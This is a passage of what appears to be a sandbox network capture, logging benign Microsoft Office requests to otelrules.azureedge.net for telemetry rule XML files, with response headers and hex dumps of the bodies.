78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:18 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:18 UTC	522	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:18 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 2374d143-301e-0020-0609-376299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131018Z-1866b5c5fbbvqncjhC1DFW0gcw000000019000000000cv0p x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-15 13:10:18 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:18 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:18 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:18 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131018Z-16547b76f7fwvr5dhC1DFW2c940000000n1000000000bcup x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:18 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:18 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:19 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 5906632b-401e-005b-378d-369c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-164f84587bfj5xwnhC1DFW3a2800000000sg00000000c1vs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:19 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49876	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:19 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-16547b76f7f9bs6dhC1DFWt3rg0000000n4g00000000ase6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:19 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:19 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 14be5296-801e-008c-31af-367130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-16547b76f7f7rtshhC1DFWrtqn0000000n8g000000004qyv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:19 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49879	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:19 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 29f76c25-201e-0000-6fd2-2ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-16547b76f7fkf5v9hC1DFW2y5s000000014g00000000dcmy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:19 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49880	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:19 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-16547b76f7f8dwtrhC1DFWd1zn0000000n6000000000ggzb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:19 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 9fe5a23c-201e-0051-74ab-367340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131019Z-16547b76f7fp6mhthC1DFWrggn0000000n6g00000000dv4t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:20 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:19 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 7208895d-401e-0047-32a2-348597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131020Z-1866b5c5fbbg6vdshC1DFW20h800000001g000000000680z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:20 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:20 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: e36af508-601e-0001-7d3a-36faeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131020Z-1866b5c5fbb5hnj5hC1DFW18sc00000001hg00000000446d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:20 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49885	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:20 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 2117b026-901e-0029-37af-36274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131020Z-1866b5c5fbbtpjhjhC1DFWr6tw000000015g00000000bxm2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:20 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49886	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:20 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:20 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: c87ec88a-b01e-00ab-2cb9-36dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131020Z-1866b5c5fbbt75vghC1DFW0qd4000000016g000000008b6x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
